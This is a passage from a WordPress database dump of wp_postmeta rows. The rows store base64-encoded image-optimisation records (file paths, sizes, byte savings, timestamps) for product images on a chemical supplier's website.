ZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzEsInRpbWUiOjE0ODM1ODYxNzksImlkIjo1MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MDUsInRpbWUiOjE0ODM1ODYxODIsImlkIjo1MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMjQ2LCJ0aW1lIjoxNDgzNTg2MTg2LCJpZCI6NTE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MjcsInRpbWUiOjE0ODM1ODYxODksImlkIjo1MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQzMSwidGltZSI6MTQ4MzU4NjE5MiwiaWQiOjUxN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTM2LCJ0aW1lIjoxNDgzNTg2MTk2LCJpZCI6NTE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1MjcsInRpbWUiOjE0ODM1ODYxOTksImlkIjo1MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjY4NiwidGltZSI6MTQ4MzU4NjIwMywiaWQiOjUxN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTA4NywidGltZSI6MTQ4MzU4NjIwNiwiaWQiOjUxN31d'); 
INSERT INTO `wp_postmeta` VALUES (30179, 486, 'wpfc_optimisation_reduction', '924774'); 
INSERT INTO `wp_postmeta` VALUES (30180, 486, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLmpwZyIsIndpZHRoIjozMDcyLCJoZWlnaHQiOjIwNDgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMuanBnIiwicmVkdWN0aW9uIjo5MjQ3MjgsInRpbWUiOjE0ODM1ODYyMTYsImlkIjoiNDg2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyMTksImlkIjo0ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MjIyLCJpZCI6NDg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb3h5LXJlc2lucy03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb3h5LXJlc2lucy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Vwb3h5LXJlc2lucy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjIyNCwiaWQiOjQ4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjIyOCwiaWQiOjQ4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyMzAsImlkIjo0ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MjMzLCJpZCI6NDg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb3h5LXJlc2lucy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb3h5LXJlc2lucy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Vwb3h5LXJlc2lucy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjIzNSwiaWQiOjQ4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyMzgsImlkIjo0ODZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG94eS1yZXNpbnMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjMzLCJ0aW1lIjoxNDgzNTg2MjQxLCJpZCI6NDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MjQzLCJpZCI6NDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MjQ2LCJpZCI6NDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MjQ4LCJpZCI6NDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MjUwLCJpZCI6NDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBveHktcmVzaW5zLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MjUzLCJpZCI6NDg2fV0='); 
INSERT INTO `wp_postmeta` VALUES (30181, 485, 'wpfc_optimisation_reduction', '605483'); 
INSERT INTO `wp_postmeta` VALUES (30182, 485, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLmpwZyIsIndpZHRoIjoyMzM2LCJoZWlnaHQiOjM1MDQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMuanBnIiwicmVkdWN0aW9uIjo2MDUzNjgsInRpbWUiOjE0ODM1ODYyNjIsImlkIjoiNDg1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zcGVjaWFsdHktcHJvZHVjdHMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYyNjUsImlkIjo0ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTUzM3g4MDAuanBnIiwid2lkdGgiOjUzMywiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTUzM3g4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3BlY2lhbHR5LXByb2R1Y3RzLTUzM3g4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MjY4LCJpZCI6NDg1fSx7ImZpbGUiOiJcL2hvbWV